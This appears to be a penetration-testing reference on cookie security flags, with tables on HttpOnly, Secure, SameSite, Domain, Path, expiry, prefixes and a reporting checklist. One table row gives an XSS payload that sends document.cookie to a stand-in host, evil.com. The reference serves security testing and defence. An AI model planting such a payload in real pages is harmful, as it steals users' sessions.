Overview
Cookies carry session tokens, auth data, and preferences. Missing or misconfigured flags expose them to theft, fixation, and cross-site attacks.Check Cookies
Browser DevTools
Application → Cookies → inspect flags per cookie.Cookie Flags
HttpOnly
| Status | Risk |
|---|---|
| Present | Cookie not accessible via document.cookie |
| Missing | XSS can steal session: <script>fetch('https://evil.com/?c='+document.cookie)</script> |
Secure
| Status | Risk |
|---|---|
| Present | Cookie only sent over HTTPS |
| Missing | Cookie sent over HTTP → MITM interception. Attacker on same network sniffs cookie in plaintext |
SameSite
| Value | Behavior | CSRF Risk |
|---|---|---|
Strict | Never sent cross-site | Protected |
Lax | Sent on top-level GET navigations | Partial — GET-based CSRF possible |
None | Always sent (requires Secure) | Vulnerable to CSRF |
| Missing | Browser default (Lax in modern browsers) | Depends on browser |
Domain
| Config | Scope |
|---|---|
Domain=.target.com | Cookie shared with ALL subdomains |
| No Domain attribute | Cookie only for exact domain |
Path
| Config | Scope |
|---|---|
Path=/admin | Only sent for /admin/* requests |
Path=/ | Sent for all paths |
Path is NOT a security boundary — JavaScript from other paths can read it via iframe tricks.
Expires / Max-Age
| Config | Risk |
|---|---|
| No expiry (session cookie) | Deleted when browser closes |
| Long expiry | Stolen cookie valid for extended period |
| Very long (years) | Persistent session even after password change |
Vulnerability Matrix
| Missing Flag | Attack |
|---|---|
| No HttpOnly | XSS → document.cookie theft |
| No Secure | MITM → sniff cookie over HTTP |
| SameSite=None | CSRF attacks |
| Domain=.target.com | Subdomain XSS → cookie theft |
| No expiry control | Long-lived stolen sessions |
| All flags missing | All of the above |
Exploitation
Steal Cookie via XSS (No HttpOnly)
Sniff Cookie (No Secure Flag)
CSRF (SameSite=None)
Subdomain Cookie Theft (Broad Domain)
IfDomain=.target.com and XSS on blog.target.com:
Session Fixation
If application accepts session ID from URL or doesn’t regenerate after login:Prevention Check
- Login with session X
- After login, check if session ID changed
- If same → session fixation vulnerable
Cookie Prefixes
Modern browsers support special prefixes:| Prefix | Requirements |
|---|---|
__Secure- | Must have Secure flag, sent over HTTPS |
__Host- | Must have Secure, no Domain, Path=/ |
__Host- prevents subdomain and path scoping attacks.
Reporting Checklist
| Check | Finding |
|---|---|
| HttpOnly missing on session cookie | Session hijacking via XSS |
| Secure flag missing | Cookie exposure over HTTP |
| SameSite=None or missing | CSRF vulnerability |
| Broad Domain scope | Subdomain attack surface |
| No session regeneration after login | Session fixation |
| Long/no expiration | Persistent stolen sessions |
| Cookie prefixes not used | Missing defense-in-depth |
Quick Reference
| Flag | Secure Value | Risk Without |
|---|---|---|
| HttpOnly | Present | XSS cookie theft |
| Secure | Present | MITM sniffing |
| SameSite | Strict or Lax | CSRF |
| Domain | Omit or exact | Subdomain attacks |
| Path | / (not security boundary) | N/A |
| Expiry | Short / session | Persistent compromise |